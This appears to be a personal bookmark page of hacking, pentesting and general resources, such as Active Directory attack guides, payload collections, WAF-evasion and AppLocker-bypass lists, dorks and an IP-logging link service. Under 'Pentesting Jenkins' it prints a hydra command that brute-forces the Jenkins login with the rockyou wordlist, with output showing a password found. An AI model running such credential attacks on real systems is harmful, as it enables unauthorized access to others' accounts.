The Book of Secret Knowledge

A collection of inspiring lists, manuals, cheatsheets, blogs, hacks, one-liners, cli/web tools, and more.

Github.com - The Book of Secret Knowledge

Awesome hackings

A curated list of awesome Hacking. Inspired by awesome-machine-learning

If you want to contribute to this list (please do), send me a pull request or contact me @carpedm20

For a list of free hacking books available for download, go here

Github.com - Awesome hacking

IMEI / iCloud Lock Checking

iFreeiCloud.co.uk - Checks Model, Capacity, Colour, Find My iPhone Status, Replaced Status, Activation Status, Service Coverage, Technical Support, Warranty Plan, Warranty Expiry & Loaner Status for Apple devices. You can also check non-Apple devices to find the Model & Manufacturer. Tool to check details of iDevices (iPhone, iPad) for iCloud lock / find my iPhone.

ImeiCheck.com - offers a variety of IMEI Check Services providing all the information about your device, fast and accessible!

MITRE framework

Github.com - Atomic Red Team

AzureAD Enumeration

Azure Active Directory - Rootsecdev

OSCP Repo

This is a list of resources and scripts that I have been gathering (and continuing to gather) in preparation for OSCP.

Github.com - OSCPRepo

oscp.infosecsanyam.in

itm4n Documentation page

Blog of offensive security consultant.

itm4n.github.io

Wallpapers

Wallpaperscraft.com

Unsplash.com

Ebooks

Allitebooks.org

Active directory exploitation and interesting items

Infosecmatters.com - Top 16 Active Directory vulnerabilities

Active Directory Security

Active Directory & Enterprise Security, Methods to Secure Active Directory, Attack Methods & Effective Defenses, PowerShell, Tech Notes, & Geek Trivia…

Pentesting tools

Github.com - Pentest Tools

PayloadAllTheThings

Github.com - PayloadAllTheThings

Internet speedtest

DSLreports.com

Information Security References

  • copy-site.zip (2321 kb)
  • rmusser.net

    Fake name generator

    nl.fakenamegenerator.com

    Expired domains

    Search for domains that are about to expire or are already expired.

    Expireddomains.net

    Responsible disclosure

    responsibledisclosure.nl

    Spamfilter blacklist checking

    Multirbl.valli.org

    Matrix.spfbl.net

    Iconic — Free “do wtf you want with” pixel-perfect icons

    Iconic.app

    GHDB - Google Hacking Database

    Exploit-db.com - Google Hacking Database

    Attacking Active Directory: 0 to 0.9

    zer1t0.gitlab.io - Attacking Active Directory: 0 to 0.9

    Pentesting Jenkins

    Pwn Jenkins

    $ hydra 127.0.0.1 -s 8080 -V -f http-form-post "/j_acegi_security_check:j_username=^USER^&j_password=^PASS^&from=%2F&Submit=Sign+in&Login=Login:Invalid username or password" -l admin -P /usr/share/wordlists/rockyou.txt            
    [...]
    [ATTEMPT] target 127.0.0.1 - login "admin" - pass "hottie1" - 556 of 14344399 [child 8] (0/0)
    [8080][http-post-form] host: 127.0.0.1   login: admin   password: spongebob
    [STATUS] attack finished for 127.0.0.1 (valid pair found)
    1 of 1 target successfully completed, 1 valid password found
    Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-06-22 15:04:47
    

    Application Security overview and mitigation list

    Applicationsecurity.io - Appsec Findings database list

    Web Application Firewall (WAF) Evasion Techniques #3

    Secjuice.com - Web Application Firewall (WAF) Evasion Techniques

    An A-Z Index of Windows CMD commands

    An A-Z Index of Windows CMD commands.

    Pentesting Web checklist

    Pentesting Web checklist

    Grabify IP LOGGER

    Create an URL that will log the IP of visitor(s).

    Grabify IP LOGGER

    Microsoft Portals Overview

    Microsoft has a lot of portals.

    After not remembering all the Microsoft Portal URLs so many times, Adam decided to make a list and with a help from a few others, have gotten to this stage. You can read more about the details on the About page.

    msportals.io - Microsoft Administrator Sites Github.com - msportals.io - Microsoft Portals

    List of Github repositories and articles with list of dorks for different search engines

    Github.com - Dorks collections list

    Microsoft AppLocker ByPass Lists

    Github.com - Ultimate AppLocker ByPass List